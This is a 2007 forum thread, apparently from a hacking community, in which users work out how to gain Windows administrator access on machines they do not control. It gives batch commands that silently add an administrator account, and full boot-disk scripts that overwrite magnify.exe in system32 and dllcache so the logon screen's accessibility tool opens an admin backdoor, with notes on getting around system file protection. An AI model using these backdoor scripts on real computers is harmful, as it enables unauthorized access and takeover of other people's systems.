djhiran Posted June 21, 2007 Share Posted June 21, 2007 No hard work to be done to gain access to NTFS partitions of XP with winhex!!! Quote Link to comment Share on other sites More sharing options...
detox420 Posted July 8, 2007 Share Posted July 8, 2007 So how would i be able to integrate this with switchblade on my U3? Quote Link to comment Share on other sites More sharing options...
GonZor Posted July 9, 2007 Share Posted July 9, 2007 So how would i be able to integrate this with switchblade on my U3? Which part? reading through the thread there is a lot of information here. Quote Link to comment Share on other sites More sharing options...
detox420 Posted July 19, 2007 Share Posted July 19, 2007 Well the part where you can silently put a hidden admin account on the computer it is being used on. I KNOW its possible because my good friend has done it but he refuses to give out the code for it. Quote Link to comment Share on other sites More sharing options...
Xqtftqx Posted July 28, 2007 Share Posted July 28, 2007 I dont know if somebody already said this above. i dont have all day to read this. You can easly do this with batch. net user Bob /add net user Bob Bobby net localgroup Administrators /add Bob Put that in a batch file and run it on the computer. It will make a user account "Bob" the password will be Bobby. And then you got a administrators account You can make one to remove it as well net user Bob /delete There you go. have fun Quote Link to comment Share on other sites More sharing options...
SomeoneE1se Posted July 28, 2007 Share Posted July 28, 2007 again, you already have to have administrator access to do that! Quote Link to comment Share on other sites More sharing options...
Joerg Posted July 28, 2007 Share Posted July 28, 2007 I did set up a bootdisk with ntfs4dos to copy a compiled batch into the system32 folder (magnify.exe). By pressing {Win}+{U} and starting the magnifier you have a administrator account. This does not require administrator rights, but needs physical access. Quote Link to comment Share on other sites More sharing options...
kickarse Posted August 9, 2007 Share Posted August 9, 2007 Perhaps we should outline our basic plan of action. It seems we all need the described ---- 1. Find an exe/dll hook that Windows uses in an Administrative privileged state AND with the ability to be modified/saved/edited/run by guest or everyone. 2. Get that exe to be loaded by Administrator and/or System AND spawn/run our extra code/payload that adds a user and password or escalates guest to Administrator access. 3. Finally, and not really needed, replaced fixed exe with normal exe to remove trace. ---- Does magnify.exe have the ability to be modified by guest or everyone?? Quote Link to comment Share on other sites More sharing options...
mexxus Posted August 9, 2007 Share Posted August 9, 2007 Hmmmm. Interesting work... I wonder if Microsoft will block access to exes if they find out, but they cant can they, otherwise windows wont load, and they cant block you from running the neat appy, as it is part of windows, but domain admins could put it in the block list. Usually accounts, even those on a domain have access to c:. Since utilman.exe is't really a core appy, it isn't as highly protected as others and isnt always running, so good choice there microsoft......... Sounds interesting, but lethal... I have treid the net commands in vista home premium and they don't work on my account (though its admin, but vista and admin are two different things...are you sure u wanna run that....access denied...but I chose my account to be an admin....too bad) I'm sure this would work even in a limited account (so long as access to c:) mexxus Quote Link to comment Share on other sites More sharing options...
Joerg Posted August 9, 2007 Share Posted August 9, 2007 @kickarse: the magnify.exe is a system file, so replacing is only possible by an administrator (or a person having admin rights) or by booting from another os. But it can be started by everyone. The difficult part is, that you need admin rights instantly and not the dirty way by booting another operating system. EDIT: http://oxid.netsons.org/phpBB2/viewtopic.php?p=4578 To make a long story short, you create a service which calls the cmd.exe with SYSTEM rights. To prove that you have system rights, you can change into the system volume information folder. But as alway, you need admin rights. Quote Link to comment Share on other sites More sharing options...
Leapo Posted August 16, 2007 Share Posted August 16, 2007 wouldn't be that hard, really. All that's required DOS boot floppy (or CD) with an NTFS driver that automatically runs a batch file that replaces Magnify.exe with your modified version. Insert floppy (or bootable CD) > boot machine > script runs > reboot into windows > use exploit Edit: Here's all the code that's required for the batch file: copy C:WINDOWSsystem32magnify.exe C:WINDOWSsystem32magnify_bak.exe del C:WINDOWSsystem32magnify.exe copy .magnify.exe C:WINDOWSsystem32 exit And this will undo it: del C:WINDOWSsystem32magnify.exe copy C:WINDOWSsystem32magnify_bak.exe C:WINDOWSsystem32magnify.exe del C:WINDOWSsystem32magnify_bak.exe exit Yes, I know I could have used "ren" instead of "copy" and "del", but I've had issues doing it that way without actually changing to the working directory. This will work for sure. Quote Link to comment Share on other sites More sharing options...
Joerg Posted August 16, 2007 Share Posted August 16, 2007 Ehm, i actually did that some time ago ;) @echo on FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %i:ntldr SET SYS=%i FOR %a IN (windows winnt) DO IF EXIST %sys%:%asystem32winlogon.exe SET WIN=%a copy ".magnify.exe" "%SYS%:%win%system32dllcachemagnify.exe" /Y copy ".magnify.exe" "%SYS%:%win%system32magnify.exe" /Y This does work on 2k and on xp And i set up a bootdisc with ntfs4dos, look here Quote Link to comment Share on other sites More sharing options...
Anthrax Posted August 20, 2007 Share Posted August 20, 2007 what can i use to make a NTFS bootable cd? iv only got a win98 boot cd Quote Link to comment Share on other sites More sharing options...
Joerg Posted August 20, 2007 Share Posted August 20, 2007 i used ntfs4dos but i'm sure there are better solutions You format the disc using the ntfs4dos prog and copy the files of bootdisc.zip onto the disc. // note to myself: read Quote Link to comment Share on other sites More sharing options...
Anthrax Posted August 20, 2007 Share Posted August 20, 2007 figured that part. anyone got an image or something of a NTFS bootcd? Quote Link to comment Share on other sites More sharing options...
ihackwindows Posted August 23, 2007 Share Posted August 23, 2007 Too long to read it all so i would say yo could make a program that copy's the files over quickly without prompt (i use c++). Then reboots you computer. Quote Link to comment Share on other sites More sharing options...
Joerg Posted August 23, 2007 Share Posted August 23, 2007 By th way, I tested the system file protection of windows xp. I replaced the files and hit reset on my virtual machine. After that, the files were still there (replaced). Can someone confirm this? Quote Link to comment Share on other sites More sharing options...
GonZor Posted August 24, 2007 Share Posted August 24, 2007 Can someone confirm this? It may have something to do with the lack of sleep but your post didn't quite make sense to me... If your asking will the "fake" files still be there on reboot, yes I think someone stated earlier in this thread that windows only checks for the files existence not the integrity of the file. Quote Link to comment Share on other sites More sharing options...
Joerg Posted August 24, 2007 Share Posted August 24, 2007 Yeah, i love posting nonsense ;) I meant that windows didn't replaced the patched files after a forced reboot, but i think it's because i deactivated the sfc on my vm, so never mind and ignore this and my last post Quote Link to comment Share on other sites More sharing options...
Leapo Posted August 25, 2007 Share Posted August 25, 2007 Ehm, i actually did that some time ago ;) @echo on FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %i:ntldr SET SYS=%i FOR %a IN (windows winnt) DO IF EXIST %sys%:%asystem32winlogon.exe SET WIN=%a copy ".magnify.exe" "%SYS%:%win%system32dllcachemagnify.exe" /Y copy ".magnify.exe" "%SYS%:%win%system32magnify.exe" /Y This does work on 2k and on xp And i set up a bootdisc with ntfs4dos, look here that works, but isn't it a tad bloated and overcomplicated? The way I wrote it up doesn't need to search every drive in the system to work... Quote Link to comment Share on other sites More sharing options...
Joerg Posted August 25, 2007 Share Posted August 25, 2007 Yes, your script works for all standard xp/vista machines. My script works for all 2000/xp/vista systems installed on another partition then C: For me it is more important to make the script work on any pc (running windows) Quote Link to comment Share on other sites More sharing options...
XtremeModifier Posted September 12, 2007 Share Posted September 12, 2007 Cool... I am going to have to try these methods on one of the many ""Personal"" systems Currently have used Live Linux Tools to change the admin password for 2000 and XP, and then I am in in about 3 minutes or so. Great for users who lock themselves out of their own systems .. ha ha Quote Link to comment Share on other sites More sharing options...
K1u Posted September 12, 2007 Share Posted September 12, 2007 Yes, your script works for all standard xp/vista machines. My script works for all 2000/xp/vista systems installed on another partition then C: For me it is more important to make the script work on any pc (running windows) Could you not just use %systemdrive% ? Quote Link to comment Share on other sites More sharing options...
GonZor Posted September 13, 2007 Share Posted September 13, 2007 Yes, your script works for all standard xp/vista machines. My script works for all 2000/xp/vista systems installed on another partition then C: For me it is more important to make the script work on any pc (running windows) Could you not just use %systemdrive% ? Thats only if you want to make it simple... or to simplify it further just use %systemroot%Â :-P Quote Link to comment Share on other sites More sharing options...
Joerg Posted September 13, 2007 Share Posted September 13, 2007 Ehm, if you try this you'll get some nice errors ;) I'm booting from a dos floppy so I don't have systemvariables If it would be so easy, I would have done this. A problem I spotted is, if someone has more than just 1 windows nt system installed, that the script just copies it once. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.